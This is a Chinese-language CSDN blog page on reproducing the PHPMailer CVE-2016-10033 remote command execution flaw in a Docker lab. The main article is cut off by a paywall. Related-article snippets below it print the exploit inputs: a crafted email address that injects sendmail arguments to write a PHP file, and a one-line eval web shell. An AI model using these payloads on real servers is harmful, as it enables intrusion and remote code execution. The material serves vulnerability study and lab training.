PHPMailer远程命令执行漏洞复现(CVE-2016-10033)

最新推荐文章于 2023-04-28 13:32:10 发布
最新推荐文章于 2023-04-28 13:32:10 发布
阅读量2.1k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: php docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36119192/article/details/105331869
版权
本文详细介绍了PHPMailer的CVE-2016-10033漏洞,这是一个由于class.phpmailer.php未正确处理用户请求引发的高危漏洞,允许攻击者通过构造恶意邮箱地址实现任意文件写入,从而执行远程命令。漏洞复现分为直接使用脚本攻击和手动攻击两部分,需要PHP的safe_mode关闭,并且影响PHPMailer低于5.2.18的版本。在复现环境中,通过提交特定数据,可以在目标网站生成可利用的hack.php文件。
摘要由CSDN通过智能技术生成

目录

漏洞复现

一:直接使用漏洞利用脚本进行攻击

二:手动进行攻击

PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。

CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。

漏洞利用条件:

  • PHP 没有开启 safe_mode(默认)

影响版本:小于 5.2.18 版本

漏洞复现

我们这里使用docker搭建复现环境

docker search cve-2016-10033
docker pull vulnerables/cve-2016-10033
docker run -d -P --name phpmailer vulnerables/cve-2016-10033

了解本专栏 订阅专栏 解锁全文 超级会员免费看
谢公子
关注
专栏目录
订阅专栏
CVE-2016-10033PHPMailer 远程代码执行漏洞
weixin_45253622的博客
06-23 2238
漏洞简介 PHPMailer是一个非常强大的 php发送邮件类,可以设定发送邮件地址、回复地址、邮件主题、html网页,上传附件,并且使用起来非常方便。 PHPMailer由于钓鱼系统sendmail命令,并且没有对输入做限制,攻击者可以通过利用 –X 参数把恶意代码写入 PHP 文件,达到执行命令的效果。 PHPMailer百度百科 利用条件 :PHP没有开启safe_mode(默认) 影响版本 :<5.2.18版本 漏洞复现 1.启动docker服务 service docker start 2
墨者学院-PHPMailer远程命令执行漏洞溯源
qq_47094508的博客
07-01 922
拿到靶场之后点击访问分享一个小工具,用来爬取相关的url Link Gopher可以看到有用的就一个mail.php 进入之后来到一个邮件测试页面,很明显这里是一个功能点 phpmailer介绍PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)burp抓包,更改email处payload为 更改message处payload为 然后访问http://124.70.71.251
PHPMailer远程命令执行漏洞溯源
cc_de_csdn的博客
08-25 303
1.打开靶场,找到发送邮件的位置,进入邮件页面 2.填写邮件消息 1.任意用户名 2.在email写入: “aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 3.在message写入: <?php @eval($_POST[a]);?> 3.使用菜刀连接,链接是:http://219.153.49.228:4105...
CVE漏洞复现-CVE-2016-10033-远程命令执行
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-28 1811
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。CVE-2016-10033PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。:小于 5.2.18 版本。
wordpress 命令执行CVE-2016-10033复现
YouthBelief的博客
11-04 2398
wordpress 远程命令执行CVE-2018-15877) wordpress 远程命令执行CVE-2018-15877)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 wordpress 远程命令执行CVE-2018-15877) WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。 0x01 漏洞描述 Plainview Activity Monitor plugin是使用
墨者 - PHPMailer远程命令执行漏洞溯源
吃肉唐僧的博客
06-30 1480
用bp抓包,发现与后台交互的文件 构建email "aaa".-OQueueDirectory=/tmp/.-X/var/www/html/a.php@ aaa.com message <?php@eval($_REQUEST[a]);?> 访问a.php文件,上传成功 菜刀无惧链接 原理参考:https...
WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
SoulCat
02-08 4782
WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行漏洞版本: WordPress &lt;= 4.6.0 PH...
php5.2漏洞,PHPMailer < 5.2.18 远程代码执行CVE-2016-10033漏洞分析
weixin_31188927的博客
03-11 764
Author: p0wd3r, dawu (知道创宇404安全实验室)Date: 2016-12-270x00 漏洞概述1.漏洞简介Dawid Golunski 在圣诞节当天发布了一个漏洞报告,报告中表明 PHPMailer 小于5.2.18的版本存在远程代码执行漏洞。成功利用该漏洞后,攻击者可以远程任意代码执行。许多知名的 CMS 例如 Wordpress 等都是使用这个组件来发送邮件,影响不可...
PHPMailer 任意文件读取漏洞CVE-2017-5223)复现
SoulCat
05-29 1756
你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切
exploit-CVE-2016-10033PHPMailer <5.2.18远程执行代码漏洞和易受攻击的容器
02-01
PHPMailer <5.2.18远程执行代码 PHPMailer是世界上最受欢迎的传输类,估计全世界有900万用户。 每天下载的速度持续加快。 由许多开源项目使用:WordPress,Drupal,1CRM,SugarCRM,Yii和Joomla! 还有很多 PHPMailer 5.2.18之前的版本存在一个漏洞,该漏洞可能导致远程代码执行(RCE)。 如果未设置Sender属性,则PHPMailer的isMail传输中的mailSend函数可能会允许远程攻击者将额外的参数传递给mail命令,从而通过在预制的发件人地址中使用“(反斜杠双引号)执行任意代码。 脆弱的环境 要为您的测试设置易受攻击的环境,您将需要安装 ,只需运行以下命令docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033 它将在8080端口上的主机上生成易受攻击的Web应用程序 利用 要利用此目标,只需运行: ./exploit host:port 如果使用此易受攻击的映像,则可以运行: ./exploit localhost:8080 利用后,名
php mailer cve利用,CVE-2016-10033PHPMailer漏洞利用
weixin_29421409的博客
03-28 375
原标题:CVE-2016-10033PHPMailer漏洞利用Pr0.s说:MalwareBenchmark的“鬼”博士第一次出手写文章,尽管思维有点儿 跳跃, 但懂行的人会知道价值~!(*^__^*) 嘻嘻……PoC链接:漏洞成因分析: 上图是PHPMailer发送邮件时,关键函数的调用关系。mailSend方法中,Sender变换之后,得到$params,最终作为第五个参数传递给mailP...
【WEB攻防】WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033) 安鸾靶场详细复现 -WordPress1
AAAAAAAAAAAA66的博客
01-04 2056
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 漏洞简介 工具 题
PHPMailer远程命令执行漏洞复现
小小猪的博客
12-13 1583
PHPMailer远程命令执行漏洞复现 漏洞简介: PHPMailerPHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。 PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。 影响版本: PHPMailer<5.2.18 环境搭建: 这里采用现成靶机 漏洞复现: aaa "aaa". -O
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源
qq_43233085的博客
01-14 679
墨者靶场 初级:PHPMailer远程命令执行漏洞溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师对某网站进行授权测试,发现了一个管理员留下的邮件测试页面,你能帮他完成测试吗 实训目标 1、了解PHPMailer用处; 2、了解Burp suite中Spider模块使用方法; 3、了解PHPMailer远程命令执行漏洞形成原因; 4、了解PHPMailer远程命令执行漏洞利用...
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 557
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
墨者PHPMailer远程命令执行漏洞溯源题解
zr1213159840的博客
01-07 476
打开环境后,给了一个页面,但是啥也没有,看不出来 对目录进行一下爆破试试,使用dirsearch,能看到有个mail.php 百度一下看下这个phpmailer有什么问题,发现存在命令执行漏洞,那么就是按照步骤跑就行了。 打开xxx/mail.php页面,在you name栏里面随便写啥,比如abc。在your email栏中填入:“aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com 在your message中填入一句话木马 &
CVE-2016-10033
最新发布
08-30
- *1* *2* *3* [CVE漏洞复现-CVE-2016-10033-远程命令执行](https://blog.csdn.net/qq_64973687/article/details/130424237)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

谢公子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值